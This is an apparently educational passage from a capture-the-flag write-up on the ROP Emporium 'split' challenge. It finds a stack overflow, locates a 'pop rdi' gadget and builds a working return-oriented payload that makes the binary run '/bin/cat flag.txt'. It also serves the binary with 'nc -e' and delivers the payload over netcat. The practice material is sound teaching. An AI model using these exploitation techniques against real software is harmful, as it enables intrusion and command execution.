ropemporium: split and callme writeup
Table Of Contents
It sounds kinda weird when you say it like that..
This is going to be an analysis of the ROP Emporium split puzzle solution along with callme, for the x86_64 platform. I prefer to rely mostly on unix tools you’d find available on any box, simply because they’re the most re-usable for any other work you do. Presumably you have other reasons to be analyzing ELF binaries? Either way, it doesn’t matter, read on.
By the way this post will be a SPOILER so don’t read it unless you want that. Maybe give it a try first! Or don’t, none of my business.
intro
A quick introduction to the site: ROP Emporium provides a binary and a flag file, and your goal is to run the binary with an input such that it prints out the contents of the flag file. It’s obviously built like a program that’s not meant to do that, but the binary is structured in such a way that it contains the gadgets necessary to print out that file.
Each challenge requires you to analyze the binary and redirect execution by precisely manipulating the stack entries.
There are other hints provided, for example: you’re on a website called ROP Emporium and you already know the class of vulnerability you’re looking for. Also they conveniently mention the instruction pointer can be overwritten by a buffer overflow consisting of 40 bytes.
buffer overflow
Let’s say you didn’t know that though. Clear the kernel ring buffer:
sudo dmesg -C
and start feeding in different lengths of strings. Once you get to 40, you’ll see a segfault.
BOF=$(perl -E 'say "X" x 40')
echo "${BOF}" | ./split
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> Thank you!
[1] 6850 done echo "${BOF}" |
6851 illegal hardware instruction (core dumped) ./split
dmesg now shows you
$ sudo dmesg -t
traps: split[6851] trap invalid opcode ip:40060f sp:7ffee0498f60 error:0 in split[400000+1000]
but if you add for instance, 5 ‘A’s on to the end, you’ll see we are beginning to overwrite the instruction pointer:
echo "${BOF}AAAAA" | ./split
...
sudo dmesg -t
split[6875]: segfault at a4141414141 ip 00000a4141414141 sp 00007ffdff9f12a0 error 14 likely on CPU 1 (core 1, socket 0)
Code: Unable to access opcode bytes at 0xa4141414117.
See all those 41s? Verify on asciitable.com that 0x41 is “A”.
Also verify that you get the exact same results if you encode the ascii characters yourself with the hexadecimal representation of that same string:
echo "${BOF}\x41\x41\x41\x41\x41" | ./split
little endian
We know something more meaningful will have to go there, but before we figure out what that is, let’s explore how we would write it there if we did know it. Instead of all 41s, let’s put in 0x41 - 0x45 to see how it shows up in dmesg.
echo "${BOF}\x41\x42\x43\x44\x45" | ../split/split
sudo dmesg -t
split[7815]: segfault at a4544434241 ip 00000a4544434241 sp 00007ffc83aa4580 error 14 likely on CPU 4 (core 4, socket 0)
Code: Unable to access opcode bytes at 0xa4544434217.
So our input was 41 42 43 44 45
and the CPU sees 45 44 43 42 41
, it’s been reversed into little-endian byte order.
Little-endian just means that when you have a representation of a number and you start reading it from left-to-right (normally, same way we pronounce numbers in decimal), which side of the number do you see first? In the representation "1024" we read "one thousand" first, and "four" last, so that would be big-endian. In little-endian, you read the small end first.
Put a pin in that for now while we figure out what needs to go there.
analyzing the split binary
The first thing we can do is look for interesting function names. I like to use the nm
tool to list symbols. If we grep for the symbols labeled with a ’t’, we get function names which reside in the “text” portion of the binary.
nm split | grep ' t'
00000000004005f0 t deregister_tm_clones
0000000000400660 t __do_global_dtors_aux
0000000000400690 t frame_dummy
00000000004006e8 t pwnme
0000000000400620 t register_tm_clones
0000000000400742 t usefulFunction
usefulFunction
sounds useful.
You can also see that there’s a usefulString
by searching the data section:
nm split | grep ' D'
0000000000601050 D __data_start
0000000000601058 D __dso_handle
0000000000601072 D _edata
0000000000601078 D __TMC_END__
0000000000601060 D usefulString
What’s happening within usefulFunction
? We can use gdb to figure that out. Use the disass
command to disassemble the function we’re curious about:
gdb -q split
(No debugging symbols found in split)
(gdb) disass usefulFunction
Dump of assembler code for function usefulFunction:
0x0000000000400742 <+0>: push rbp
0x0000000000400743 <+1>: mov rbp,rsp
0x0000000000400746 <+4>: mov edi,0x40084a
0x000000000040074b <+9>: call 0x400560 <system@plt>
0x0000000000400750 <+14>: nop
0x0000000000400751 <+15>: pop rbp
0x0000000000400752 <+16>: ret
End of assembler dump.
Or get the same info with objdump
:
objdump -D split
[SNIP]
0000000000400742 <usefulFunction>:
400742: 55 push %rbp
400743: 48 89 e5 mov %rsp,%rbp
400746: bf 4a 08 40 00 mov $0x40084a,%edi
40074b: e8 10 fe ff ff call 400560 <system@plt>
400750: 90 nop
400751: 5d pop %rbp
400752: c3 ret
400753: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
40075a: 00 00 00
40075d: 0f 1f 00 nopl (%rax)
[/SNIP]
So system
is being called with something, and the call is landing in the PLT (procedure linkage table). This is a lookup table the ELF format uses to enable lazy binding of external calls, and since we know the virtual address of the stub that ends up there we don’t need to go too deep in understanding exactly how it works.
what’s it being called with? In x64, the rdi
register holds the argument to system
(on our system it’s called edi
but it’s the same). gdb can also tell us what’s being loaded into that register in the line right above the system call with the x/s
or “examine as string” command:
(gdb) x/s 0x40084a
0x40084a: "/bin/ls"
Okay! So usefulFunction
is calling system("/bin/ls")
. What we need to do is execute this line but with a different string in the rdi
register. Maybe one that prints the flag.txt file?
Remember we already saw a usefulString
in the data section, what’s in that? gdb can tell us that too in the same way.
(gdb) x/s 0x601060
0x601060 <usefulString>: "/bin/cat flag.txt"
Perfect!
ROP chain
So the goal is to execute the system
call with the usefulString
loaded into the rdi register instead of what the program is loading in. This is the perfect target for a ROP gadget.
If we could find a gadget which pops the next stack value into %rdi
and returns,
pop rdi
ret
then we could load the address of that gadget into the stack (overwriting the instruction pointer), and put the address of /bin/cat flag.txt
right after it, so it ends up in rdi. And then right after that, we’d put the address of the system
call, so that the return would go there and execute system("/bin/cat flag.txt")
.
finding ROP gadgets
Here I must admit, I’m a bit of a fraud. Having already extolled the virtue and purity of using only builtin unix tools for our analysis, there are simply better toolsets when it comes to analyzing a binary for ROP gadgets.
So I wussed out and used Ropper which is a Python framework for disassembly and binary analysis. If anyone has better ideas please email me. Nevertheless, the mighty Snake provides:
ropper --file split | grep rdi
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
0x00000000004006d4: add byte ptr [rax], al; add byte ptr [rdi + 0x400806], bh; call 0x550; mov eax, 0; pop rbp; ret;
0x00000000004006d6: add byte ptr [rdi + 0x400806], bh; call 0x550; mov eax, 0; pop rbp; ret;
0x00000000004007c3: pop rdi; ret;
This last entry is exactly what we said we needed.
the plan
So we have a buffer overflow in main, and our ROP chain will need to:
- Overwrite the return address with the address of the ROP gadget
- The ROP gadget will take whatever’s next on the stack and place it in
rdi
and then - the ROP gadget will return using the next address in memory, which needs to be the system call.
The address of the system call is where usefulFunction
looks up system@plt
, and that address was found earlier.
payload
The payload will be <overflow string> + <gadget address> + <useful string address> + <system@plt call>
All stack frames need to align to 8 bytes, so 0x004007c3 is actually 0x00000000000407c3, so when you incorporate them into the payload, you need to pad with the zeros at the end.
Lookup the ascii characters if they are printable at https://asciitable.com. Some of them are. I like to set up a table to do all parts of the 64-bit address construction.
Structure | Address | Reversed bytes | Opcode |
---|---|---|---|
rop gadget | 0x004007c3 | c3 07 40 | \xc3\x07@\x00\x00\x00\x00\x00 |
cat flag string | 0x00601060 | 60 10 60 | `\x10`\x00\x00\x00\x00\x00 |
system@plt call | 0x0040074b | 4b 07 40 | K\x07@\x00\x00\x00\x00\x00 |
Now our final payload will be:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00
Lets run it:
echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00' | ./split
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> Thank you!
Exiting
[1] 33579 done echo |
33580 segmentation fault (core dumped) ./split
We can also run our split
executable over a connection!
nc -lvp 9999 -e ./split
and in another terminal
echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc3\x07@\x00\x00\x00\x00\x00`\x10`\x00\x00\x00\x00\x00K\x07@\x00\x00\x00\x00\x00' | nc localhost 9999
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...
> Thank you!
ROPE{a_placeholder_32byte_flag!}
split by ROP Emporium
x86_64
Contriving a reason to ask user for data...